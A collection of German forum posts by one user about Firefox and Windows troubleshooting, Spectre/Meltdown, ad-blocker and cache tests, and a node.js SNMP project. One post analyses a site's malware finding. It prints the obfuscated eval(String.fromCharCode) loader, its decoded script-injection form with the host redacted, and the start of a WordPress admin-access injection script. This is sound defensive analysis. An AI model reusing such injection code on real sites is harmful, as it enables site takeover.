Beiträge von Casali


    - der Hinweis auf XP- Reparatur war mir sehr hilfreich, danke dafür, allerdings habe ich nicht von XP- CD repariert, sondern vom Vollbackup der XP- Partition, nach mehreren Versuchen hat das 1 1/4 Jahre alte Backup von 11/2016 mit Firefox Vers. 34.0.5 und Thunderbird Vers. 38.5.0 und dem damaligen XP- Stand funktioniert


    Dann hast du zumindest mich zuvor mit der Aussage, du hättest neu installiert, unabsichtlich in die Irre geführt. Das Einspielen eines Images ist keine Neuinstallation. Das Einspielen eines Backups im Falle von Windows schon gar nicht.
    Die Anleitung zur Reparatur sollte dir aber ausdrücklich eine Neuinstallation ermöglichen. Du hattest doch zuvor geschrieben, dass diese nur wegen des mbr-Problems nicht möglich sei.


    Dass du xp für einige alte Programme weiter nutzen möchtest, kann ich ja durchaus verstehen. Ich hatte dich so verstanden, dass du es auch nur dazu nutzen möchtest, dass also Firefox und Thunderbird nur im Ausnahmefall benötigt würden. Deine jüngsten Aussagen deuten aber an, dass es eher die Regel ist, denn die Ausnahme. Das ist nun wirklich keine gute Idee.


    Zum Ist-Stand: Wie Sören gewinne auch ich den Eindruck, dir sei das eigene System völlig egal. Du hast jetzt ein xp, das nicht einmal auf dem letzten Patchlevel ist. Wobei selbst der schon alt wäre. Andere Softwarekomponenten sind ebenfalls auf irgendeinem Altstand.
    Anstatt es ordentlich zu machen, hast du einen Zustand wiederhergestellt, den du anscheinend ebenfalls nicht genau kennst. So hast du dir nur wieder unbekannte Altlasten auf das System kopiert. Da musst du dich nicht wundern, wenn es immer noch nicht richtig funktioniert. Wenn du mich fragst, dann war das alles vertane Zeit.


    sie wird dadurch auch nicht wahrer.


    Ich hatte schon befürchtet, dass so etwas käme. Deshalb hatte ich extra Links gegeben, die zeigen, von wem diese Aussage stammt. Oder möchtest du mitteilen, dass du dich in dieser Sache besser auskennst als Paul Kocher und die anderen Forscher, die diese Lücke entdeckt haben und seit Monaten mit Intel & Co. zusammenarbeiten, um sie zu beheben?

    Du hast sehr schlecht recherchiert. Das Problem kann nicht durch Software behoben werden. Sämtliche Software Updates, selbst die die Firmware-Updates, werden das Problem Spectre nicht lösen. Sie werden es lediglich erschweren, es auszunutzen. Zum Beispiel, indem sie das Timing etwas ungenauer messbar machen. Der Fix von Mozilla macht etwas ähnliches. Gelöst ist Spectre damit nicht.

    Noch ein Update:


    Ich habe eine Liste gefunden, der man entnehmen kann, ob ein AV-Programm supportet ist oder nicht: https://docs.google.com/spread…uirADzf3cL42FQ/edit#gid=0


    Außerdem gibt es noch eine wirklich schlechte Nachricht: Spectre wird sich wohl gar nicht durch Software Updates beheben lassen sondern nur mit neuen Prozessoren.
    Dieses Problem wird uns noch viele Jahre begleiten. Bis dahin müssen wir uns demnach mit Maßnahmen behelfen, die das Problem zwar nicht lösen aber immerhin erschweren, wie der Patch im Firefox 57.0.4:


    Zitat


    Spectre is a problem in the fundamental way processors are designed, and the threat from Spectre is “going to live with us for decades,” said Mr. Kocher, the president and chief scientist at Cryptography Research, a division of Rambus. [...] A fix may not be available for Spectre until a new generation of chips hit the market.


    “This will be a festering problem over hardware life cycles. It’s not going to change tomorrow or the day after,” Mr. Kocher said. “It’s going to take a while.”


    Die Aussage stammt von Paul Kocher, einem der beteiligten Forscher.


    Quelle: https://www.nytimes.com/2018/0…iness/computer-flaws.html
    Zu Paul Kocher: https://en.wikipedia.org/wiki/Paul_Kocher und https://de.wikipedia.org/wiki/Spectre_(Sicherheitsl%C3%BCcke)

    Zitat


    Spectre wurde unabhängig voneinander durch Forscher von Googles Project Zero und einer Gruppe um Paul Kocher entdeckt[2] und am 3. Januar 2018 in Zusammenhang mit der verwandten Sicherheitslücke Meltdown veröffentlicht.


    Es sieht so aus, als wäre das diesmal keine Schlagzeilenhascherei der Presse sondern wirklich ernst.

    Den Link auf die Seite von Microsoft hatte ich oben ja schon gepostet. Ich habe das Thema deshalb erneut erwähnt, weil das Update dem Hörensagen nach sogar dann blockiert wird, wenn das ursächliche AV-Programm längst deinstalliert wurde. Angeblich allein aufgrund verbliebener Einträge in der Registry.
    Wie gesagt, ich kann das nicht verifizieren. Es war als Hinweis gedacht, dem jemand vielleicht nachgehen sollte, der das automatische Update nicht bekommt.


    Mein Rat wäre: Ruhe bewahren und sich nicht verrückt machen lassen!


    Nach meiner Einschätzung ist die Zeit der Gelassenheit nun doch vorbei. Inzwischen liegen die detaillierten Beschreibungen zu Meltdown und Spectre für jedermann vor. https://meltdownattack.com/


    Aus der Conclusion:

    Zitat


    Without requiring any software vulnerability and independent of the operating system, Meltdown enables an adversary to read sensitive data of other processes or virtual machines in the cloud with up to 503 KB/s, affecting millions of devices.


    Die Dokumente beschreiben auch eine "end-to-end attack". Somit muss man davon ausgehen, dass versierte Angreifer sie auch zu nutzen wissen.
    Es gibt auf der Seite ein Video, das zeigt, wie über Meltdown Speicherinhalte ausgelesen werden. Das kann prinzipiell auch unbemerkt per JavaScript über eine entsprechend präparierte Webseite geschehen. Die neuesten Updates von Firefox und Chromium sollen das zumindest erschweren.


    Stand heute würde ich deshalb sehr dazu raten, die Updates durchzuführen und die verfügbaren Patches für die Betriebssysteme einzuspielen.
    Betroffen sind neben Intel und AMD wohl auch ARM-Chips und einige von nVIDIA. Neben Windows, MacOs und Android auch iOS.


    Mein Windows 10 hat sich heute automatisch gepatcht. Irgendeine spürbare negative Auswirkung auf die Performance habe ich bisher nicht festgestellt. Schon gar nicht die 30%, von denen teilweise in der Presse die Rede war.


    Zur Info vielleicht noch ein Hinweis zu der AV-Problematik, den ich heute in der Warteschlange beim Einkaufen aufgeschnappt habe. Verifizieren kann ich das nicht, aber es erschien mir glaubwürdig:
    Jemand erzählte dort, dass er das Windows 10 Update nicht bekommen habe, weil er früher mal eine 3rd-Party-AV-Software verwendet hatte. Die hätte er zwar nach dem Update auf Windows 10 deinstalliert, aber anscheinend haben verbliebene Einträge in der Registry dafür gesorgt, dass der Updater glaubte, die Software sei noch installiert. Deshalb sei das Update nicht durchgeführt worden. Nach der Bereinigung der Registry hätte es dann reibunglos geklappt.

    Was die Resulate aus dem Test betrifft, ich halte sie für absolut normal, sogar für gut. Ich bekomme ähnliche Resultate, insgesamt sogar schlechter, was daran liegt, dass ich nur eine 16000-Leitung habe und ich gerade nicht allein im Internet unterwegs bin, während du eine viel bessere Verbindung per Kabel hast.


    Meiner Meinung nach jagst du wirklich nur einem Gespenst hinterher. Die besseren Zeiten beim Reload lassen sich durch das Cachen erklären.


    Außerdem siehst du in deinen Ergebnissen gut die völlig normalen Schwankungen: Amazon war in diesem Fall ohne Erweiterungen beim ersten Aufruf langsamer als mit, bei gmx verhielt es sich umgekehrt. Alles ganz normal und kein Grund, die Erweiterungen zu deinstallieren.
    Wie oben erläutert. Man kann nicht im Voraus sagen, ob Werbeblocker eher bremsen oder die Ladezeit verkürzen. In jedem Fall erfüllen sie aber ihren Zweck: Sie blenden Werbung und Tracker aus.


    Ich kann mich nicht zu der Qualität der beiden Blocker äußern - im Gegensatz zu anderen, die das zwar de facto auch nicht können, es aber trotzdem ständig tun.
    Ich weiß aber aus eigener Erfahrung, dass eine Kombination von Werbe- und Trackingblocker mehr filtert als eine der Erweiterungen allein. Ich habe auch noch keine Probleme feststellen können, was natürlich nicht heißt, dass es sie nicht geben kann. Bei mir treten jedenfalls seit Jahren keine auf.
    Laut der Webseite von Disconnect ist diese Erweiterung kompatibel mit anderen Blockern. Bei dir verursacht sie anscheinend auch keine Probleme. Ich sehe deshalb keinen Grund, diesbezüglich etwas zu ändern.


    Beurteilen musst du es am Ende selbst. Ich bin mir aber ziemlich sicher, dass der Firefox bei dir ganz normal funktioniert. Auch um das WLAN brauchst du dir keine Sorgen machen. Die Bandbreiten des WLAN sind deutlich höher als das, was du über Kabel oder DSL bekommst, selbst wenn du eine 200MBit-leitung hast. Das schafft modernes WLAN auch durch eine dicke Wand bei einem Ping von 12ms locker.


    bin kein Windows'er, sondern nutze Linux, und auch nur mit AMD, keine Intel


    Das hilft dir in diesem Fall nicht. Derzeit wird in diesem Zusammenhang von zwei Problemen gesprochen, Spectre und Meltdown. Sie betreffen laut Heise Windows, Linux, MacOs und Android. Neben Intel ist demnach auch AMD zumindest von einem Angriffsscenario betroffen.



    was sollte man nun dringend beachten


    Mein Rat wäre: Ruhe bewahren und sich nicht verrückt machen lassen!
    Es sind noch gar nicht alle Details veröffentlicht, und doch drehen einige schon am Rad. Die einen schreiben von 5% Performance-Verlust, andere gar von 30%. In den Foren regen und spielen sich die Leute auf, dabei weiß noch niemand genau, ob wir im Alltag überhaupt etwas davon bemerken werden.


    Zum Risko schreibt Heise:


    Zitat


    Klar scheint nach den Analysen von Google jedenfalls zu sein, dass man lokal Code auführen können muss, um einen Angriff einzufädeln.


    Wenn das stimmt, dann ist das zwar immer noch ein ernstes Thema. Allerdings sollte man zur Bewertung beachten, dass jemand, der lokal Code ausführen kann, auch ohne Ausnutzung dieser Lücken im Chip heimlich Passwörter und andere sensible Daten lesen kann. Sogar viel einfacher.
    Wer diese Chip-Lücke ausnutzen will, muss zunächst einmal die Information haben, wie das genau funktioniert. Diese Informationen sind noch nicht öffentlich. Einen Key-Logger hingegen kann schon jetzt jedes Script-Kid in Umlauf bringen.


    Man beachte auch den Hinweis von Microsoft, dass manche, leider nicht genannte, AV-Programme Probleme beim Installieren der Patches machen können. Unter Umständen werden diese Patches dann erst gar nicht bereitgestellt. Man kann das aber auf eigenes Risiko durch einen Registry-Hack umgehen. Das würde ich auf keinen Fall tun. Siehe dazu: https://support.microsoft.com/…security-updates-released


    Die Berichte erwecken den Anschein, als wären die Patches mit der heißen Nadel gestrickt worden. Außerdem ist zu lesen, dass dazu größere Eingriffe in den Kernel notwendig waren. Das kann ich beides nicht beurteilen.
    Trotzdem werde ich, soweit es meine Linuxinstallation betrifft, die Patches erst später installieren, wenn klar ist, dass sie nicht zu heiß waren.
    Für mein Windows 10 kann ich das Update nicht verhindern, außer durch die Installation eines nicht unterstützten AV-Programms ;) .


    Da ich eigentlich nur meine Kalender und Adressbücher synchronisieren möchte


    Dafür ist Firefox-Sync gar nicht geeignet. Das lässt sich über WebDav erreichen.



    Lesezeichen wäre eine nette Dreingabe


    Dafür schon.



    und dies auch nur im heimischen Netz, ist für mich alles, was über das (W)LAN hinausgeht uninteressant.


    Wenn immer nur ein Gerät aktiv ist, dann kannst du einfach die Profile des Firefox und des Thunderbirds sharen. Das ist aber eine Krücke. Besser wäre WebDav, das bietet die Owncloud, plus Sync für die Lesezeichen.


    Also, die Ergebnisse der Messungen zeigen kürzere Ladezeit, wenn der Cache beim Beenden des Browsers nicht geleert wird.


    Es wäre nett gewesen, die Ergebnisse auch mitzuteilen. Denn dass die Ladezeit ohne Cache höher ist als mit, liegt in der Natur der Sache. Das hatte ich ja versucht, dir zu erklären.


    Ich vermute nämlich, dass du einem Gespenst hinterherjagst. Es ist gut möglich, dass der Unterschied, den du beobachtest, allein darauf zurückzuführen ist, dass beim erneuten Laden einer Seite nach kurzer Zeit mehr aus Cache genommen werden kann als wenn einige Stunden dazwischen liegen. Das ist völlig normal.



    Was den Test mit einem add-on-losen Profil betrifft, da konnte ich auch eine schnellere Ladezeit vernehmen als beim Add-On-Profil.


    Ich hatte dich nur deshalb darum gebeten, mit einem neuen Profil durchführen, um Add-Ons als Störquelle auszuschließen und um möglichst identische Testbedingungen zu haben.



    Aber vielleicht hängt das Ganze mit einer eher langsam gewordenen WLAN-Verbindung zusammen (ich habe vom Betreiber einen neuen Modem-Router bekommen, der anscheinend doch nicht so schnell ist), da der PC im anderen Raum steht (Altbau mit dicken Wänden) und die Verbindung einen PING von 12ms Sekunden hat.


    Auch das spricht für den Cache als Verursacher, im positiven Sinn. Die Latenz ist mit 12ms recht hoch, aber sie betrifft ja alles, was über diese Verbindung läuft. Von den üblichen Schwankungen abgesehen, ist die WLAN-Verbindung nunmal so, wie sie halt ist. Sie unterscheidet nicht, ob eine Seite zum ersten oder zweiten Mal geladen wird.


    Aber: Je schlechter die Verbindung ist, desto mehr macht sich natürlich der Cache positiv bemerkbar. Insofern kann das eine Rolle spielen, ja.
    Hättest du eine hypothetische Verbindung, die ebenso schnell ist, wie das Laden aus dem Speicher oder von der Platte, dann würdest keinen Unterschied messen können. Hättest du, als anderes Extrem, noch ein ein altes 12k-Modem, den wäre der Unterschied so deutlich, dass du zwischendurch den sprichwörtlichen Kaffee trinken könntest.


    Wenn du absolute Klarheit haben willst, dann begebe dich mit deinem Rechner an einen Ort, an dem die Verbindung besser ist. Der Unterschied sollte dann kleiner ausfallen.



    Ich habe jedenfalls die Add-Ons Disconnect und UBlockOrigin deaktiviert und dann getestet und da schau her: die Messung ergab auch schnellere Ladezeit


    Das hängt grundsätzlich von der Seite und der Funktionsweise der Add-Ons ab. Sie benötigen zum Filtern natürlich etwas Zeit. Andererseits werden manche Inhalte dann gar nicht erst (oder nicht vollständig) geladen, was wiederum einen Zeitgewinn mit sich bringen kann. Eine pauschale Aussage ist schwerlich möglich.
    Inwieweit sich die beiden Add-Ons in die Quere kommen können, kann ich nicht beurteilen. Sie haben beide keinen schlechten Ruf. Disconnect ist hoch dekoriert und wirbt sogar mit Mozilla als Partner.
    Trotzdem, die beiden sind in Teilen redundant. Dass das etwas Zeit kostet, ist nicht auszuschließen.



    oder ich stelle sie so ein, dass sie die besagten Viel-Lader-Seiten schneller geladen werden, in dem sie von der Filtrierung ausgeschlossen werden.


    Das verstehe ich nun überhaupt nicht. Laut deiner Beschreibung macht sich die Verzögerung ja nur beim ersten Laden bemerkbar. Gerade für Seiten, die du oft lädst, würde ich den Add-Blocker dann aktiv lassen.


    siehe auch: https://sitecheck.sucuri.net/results/ww ... aktuell.de


    Dieser Link liefert wesentlich mehr Informationen als der Screenshot zuvor. Aber weshalb hast du denn nicht die 10 Minuten spendiert, diese weiteren Infos auch zu geben?


    Unter dem Link kann man sich die Payload anschauen. Sie beginnt mit


    Code
    <div class="td-a-rec td-a-rec-id-header "><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 115, 115, 99,


    Wenn man die dekodiert, erhält man:


    Code
    var sscript = document.createElement("script");  
    sscript.type = "text/javascript";  
    sscript.src = "https://xxxxxx"; 
    document.head.appendChild(sscript);


    Den Link habe ich unkenntlich gemacht. Das Nachladen eines Scriptes ist nicht ungewöhnlich. Damit ist aber klar, dass der Befund auf einer Signatur beruht, vermutlich auf der Adresse der Domain, von der nachgeladen wird. Die ist anscheinend hinlänglich bekannt.


    Das nachzuladende Script beginnt so:

    Code
    getmeone();
    checkmeone();
    
    
       
     function putmeone()  {
    
    		 var site = extractSummary(document.head.innerHTML);
    		 if(site == "null") { return; }
    		 var newuser_url = site+String.fromCharCode(119, ...


    Weiter habe ich nicht geforscht. "Get me on" und "Check me on" sind ja schon fast selbstsprechend ;-).
    Per Google findet man zu dem Script rasch eine bekannte Injection, deren Ziel es ist, Zugriff auf Admin Accounts von Wordpress-Seiten zu bekommen.
    Demnach richtet sich die Malware in erster Linie gegen den Betreiber der Seite, um dort weiteren Zugriff zu bekommen.



    Habe aber auch nichts anderes erwartet, da deren Support auch nur nach Lust und Laune arbeitet.


    So wie ich das nach der kurzen Recherche sehe, sollte der Betreiber ein ernsthaftes Interesse haben. Er ist das Ziel - (noch) nicht die Besucher.

    Das ist schon machbar. Ob es leicht verständlich ist, musst du beurteilen.


    Für meinen Geschmack war der WismutKumpel oben ein wenig zu optimistisch. Ganz so einfach wie mit den Kalendern geht das nämlich nicht. Er wird schon wissen, weshalb er selbst Sync verwendet, obwohl er die Infrastruktur hätte. Ich benutze ebenfalls Sync für meine Lesezeichen. Ich habe kein Problem damit, dass die in der Cloud liegen, obwohl ich sehr viel Wert auf Privacy lege.


    Während es für Kalender und Kontakte die entsprechenden WebDav-Server von der Stange gibt, trifft das hier nicht zu. Du benötigst den Sync-Server von Mozilla. Den musst du zunächst auf dem Raspberry installieren.
    Eine Anleitung dazu findest du hier: https://www.einplatinencompute…sync-server-installieren/


    Ich würde nur dann dazu raten, wenn du auch verstehst, was dort beschrieben ist. Wer nur einfach abtippt, bekommt spätestens dann Probleme, wenn mal etwas nicht mehr funktioniert.


    Außerdem müsstest du noch für die sichere Kommunikation zu deinem Raspberry sorgen. Sonst wäre ja nichts gewonnen. Ich zumindest würde meine Daten lieber verschlüsselt bei Mozilla ablegen als sie unverschlüsselt durch die Gegend zu schicken.
    Das heißt, du müsstest dich dann auch mit Themen wie vpn, IP-Sec usw. beschäftigen. Dort hört leicht verständlich dann irgendwann auf.

    Ich habe mir das Video auf der Seite angeschaut. Aus der Helikoptersicht stellt es sich mir so ähnlich dar, wie die Grundidee hinter Java. Man schreibt die App in plattformunabhängigem Code, der bei Java durch die JRE und bei Electron durch Node und den Browser dann plattformspezifisch interpretiert/kompiliert wird und ausgeführt werden kann.


    Ein Problem bei Java (ich meine jetzt Applikationen) ist, dass die unterschiedlichen JREs dann doch nie ganz gleiche Resultate liefern, vor allem dann, wenn sie nicht von Sun/Oracle sind.
    Unter Linux gibt es neben dem Original auch eine offene SDKs/JREs, Apple hat sich Jahre lang schwer getan. Im Resultat kommt es dann immer wieder vor, dass Kleinigkeiten nicht passen, z.B. das Schriften abgeschnitten werden, weil sie aufgrund der leicht unterschiedlichen Größe nicht mehr in ein Label passen usw. .
    Ein größeres Problem sind oftmals die Versionsabhängigkeiten. Das PLM verlangt Java Version x, der Netzworkmonitor kommt mit Version y.
    Ich würde mir wünschen und hoffe, dass es hier besser wird und alle am selben Ende des Strangs ziehen. Insofern ist die Entscheidung, Positron nicht mehr weiterzuverfolgen, vielleicht eine gute.


    Ich bin heute früh, obwohl ich noch ein paar Tage Urlaub habe, in die Firma gefahren und habe dort einen Beispiel-Code aus dem node-net-snmp ausprobiert. Es funktioniert. :)


    Nach dem Urlaub geht es dann weiter. Danke soweit.


    Ich habe mal wieder ein Ergebnis von Virus Total und wollte mal nachfragen, ob diese 2 Befunde aussagekräftig genug sind.


    Die einzige echte Information, die du daraus ziehen kannst, ist die, dass die genannten 2 von 66 Scannern auf der Seite Malware erkannt haben oder eine gewisse Wahrscheinlichkeit dafür.
    Ich wage zu behaupten, dass hier niemand gesichert sagen kann, ob es sich dabei um Fehlalarme handelt oder nicht. Dazu müsste man zumindest die Algorithmen der Scanner kennen und auch wissen, ob der Alarm aufgrund einer eindeutigen Signatur erfolgte oder durch eine Heuristik.
    Man kann allenfalls anhand der Anzahl vermuten, dass die Seite wahrscheinlich harmlos ist. Es bleibt aber eine Vermutung - nichts weiter. Es kann ebenso sein, dass tatsächlich nur diese beiden Scanner die Malware erkannt haben.
    Wie du damit umgehst, musst du am Ende selbst entscheiden.

    Ich kannte das Positron bisher als das Antiteilchen des Elektrons, also als Lepton. Und natürlich das positronische Gehirn von Lt. Commander Data. ;)


    Ja, Spidernode machte mir schon den Eindruck, als würde es stillstehen oder von anderen Entwicklungen überholt werden. In der IT ist alles sehr schnellebig.

    Ich habe dir zwei Bilder angehängt, die zeigen, auf was ich hinaus will. Ich habe die Seite von Spiegel Online zunächst direkt nach dem Start aufgerufen. Der Cache war leer. Du siehtst eine Ladezeit von 5,01s. In der Spalte "Übertragen" erkennst du, dass alle Inhalte aus dem Web geladen wurde.


    Danach habe ich die Seite erneut aufgerufen. Die Ladezeit beträgt jetzt nur noch 3,85s. In der Spalte "Übertragen" erkennt man den Grund dafür. Viele Inhalte wurden nicht mehr aus dem Web sondern aus dem Cache geladen.

    Ein Problem?


    Nein, das ist kein Problem. Es gibt einen Unterschied zwischen einem Modem und einem Router. Wenn du ein reines Modem hättest, dann bräuchtest du zusätzlich einen Router/Gateway. Darauf wollte ich hinaus. Insbesondere wollte ich erfahren, ob es noch zusätzliche Caches, wie einen Proxy, gibt. Das hat sich geklärt.

    Manchmal ist man wirklich betriebsblind. Das ist mir schon fast peinlich. Ich war so darauf fokussiert, die Aufgabe über eine Erweiterung lösen. Ich wollte gern mal selbst ausprobieren, wie man eine Webextension erstellt.
    Erst als ich mir am Nachmittag weitere Gedanken zur Umsetzung, insbesondere zu den Details des SNMP-Protokolls gemacht habe, wurde mir klar, dass eine Erweiterung in diesem Fall absolut nicht die optimale Lösung ist.


    Bei der Suche nach den RFCs bin ich auf dieses Projekt gestoßen: https://github.com/stephenwvickers/node-net-snmp
    Der Autor stellt damit für node.js alles Wesentliche bereit, was man benötigt, um mit einem SNMPv2c-Agent per JavaScript zu kommunizieren.
    Das erspart nicht nur viele Stunden des Einlesens in die RFC und das Schreiben der entsprechenden Funktionen. Die Aufgabe serverseitig über node.js zu lösen ist auch einfach die "schlauere" Idee. Man ist dann ganz unabhängig vom verwendeten Browser, der Version, der Signierung, ... .


    Ich werde meinen "Monitor" deshalb über eine dynamische Webseite bauen. Das habe ich zwar auch noch nicht gemacht, aber den JS-Teil und die Anzeige bekomme ich hin. Das "Schönmachen" der Seite ist dann für mich weniger interessant. Da lasse ich mir von einem Bekannten helfen.


    Für Mitlesende interessanter als meine Pläne:


    Bei meiner Recherche habe ich auch von der Möglichkeit gelesen, node.js als Executable in eine Erweiterung einzubinden und über nsIProcess zu nutzen. Der Firefox wird damit quasi zum Node.js-Server. Das klingt spannend und ermöglicht einiges, was über einen reinen Browser hinausgeht. Siehe http://rawkes.com/articles/running-node.html


    Bei Mozilla hat man anscheinend ähnliche Gedanken. Es gibt ein entsprechendes Projekt, das aber im Moment zu ruhen scheint:
    https://medium.com/mozilla-tec…-and-node-js-33c13e29beb1
    https://github.com/mozilla/spidernode